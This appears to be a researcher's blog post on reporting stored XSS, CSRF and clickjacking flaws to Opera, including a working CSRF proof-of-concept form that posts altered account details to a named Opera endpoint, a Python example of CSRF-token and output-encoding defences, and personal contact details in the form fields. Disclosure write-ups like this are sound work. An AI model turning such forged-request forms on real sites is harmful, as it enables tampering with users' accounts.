
Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera



Nowadays I am not very active in bug bounty programs; however, I still wanted to share my experience with Opera. Opera does not have a bug bounty program, but they certainly have their own way of thanking researchers: sending them some swag and listing their name in the Hall of Fame.

I reported a few vulnerabilities to Opera, including a stored XSS, a CSRF and a clickjacking vulnerability. The POCs for the vulnerabilities are as follows:

Stored XSS


The "Username" input was not being sanitized properly, which resulted in execution of JavaScript.

CSRF POC

The form was missing CSRF tokens; an attacker could have used a CSRF attack to manipulate the form details.

POC

<html>
  
  <body>
    <form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST">
      <input type="hidden" name="email" value="rafaybaloch&#64;gmail&#46;com" />
      <input type="hidden" name="name" value="Rafay&#32;Baloch" />
      <input type="hidden" name="address1" value="f&#45;10&#44;afasf&#32;afs&#32;asf&#32;1&#44;block&#32;15&#32;near&#32;income&#32;tax&#32;office&#44;asssssss&#45;e&#45;johar" />
      <input type="hidden" name="address2" value="" />
      <input type="hidden" name="city" value="Karachi" />
      <input type="hidden" name="state" value="" />
      <input type="hidden" name="country" value="PK" />
      <input type="hidden" name="zip" value="44000" />
      <input type="hidden" name="phone" value="&#43;923333333333" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
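The two server-side defences the stored XSS and CSRF findings point to, as an added Python example (not Opera's code): a CSRF token bound to the session with an HMAC so a cross-origin form like the POC above, which cannot carry a valid token, is rejected, and HTML-encoding of the stored name on output. The session ids, form fields and handler name are assumptions for illustration.

```python
import hashlib
import hmac
import html
import secrets

# Constructed server-side secret for the example (assumption: a real app loads
# it from configuration, never from source code).
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Return a token bound to this session: random nonce + HMAC over session:nonce."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def csrf_token_valid(session_id: str, token: str) -> bool:
    """Recompute the MAC for the presenting session and compare in constant time.

    A token minted for another session (or forged without the secret) fails here.
    """
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_details_post(session_id: str, form: dict) -> dict:
    """Simulated handler for an account details form (hypothetical endpoint).

    Rejects the request unless a valid token for this session accompanies it,
    then returns the name as it would be rendered back into a page.
    """
    if not csrf_token_valid(session_id, form.get("csrf_token", "")):
        return {"status": 403, "error": "missing or invalid CSRF token"}
    # The stored value may be anything; encoding happens at render time so a
    # name such as <script>alert(1)</script> becomes inert text in the page.
    rendered_name = html.escape(form.get("name", ""), quote=True)
    return {"status": 200, "rendered_name": rendered_name}


if __name__ == "__main__":
    token = issue_csrf_token("sess-1")
    print(handle_details_post("sess-1", {"name": "Rafay Baloch"}))             # 403
    print(handle_details_post("sess-1", {"name": "<b>x</b>", "csrf_token": token}))  # 200
```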

Opera Hall Of Fame

So, for my findings, Opera listed my name in their Hall of Fame:



Gift from Opera

As a token of appreciation, they also sent me the following gifts:


Opera is still sending out some good stuff. I would recommend that researchers start looking at Opera's subdomains for low-hanging fruit such as XSS; I know there are a lot of unfixed vulnerabilities out there.
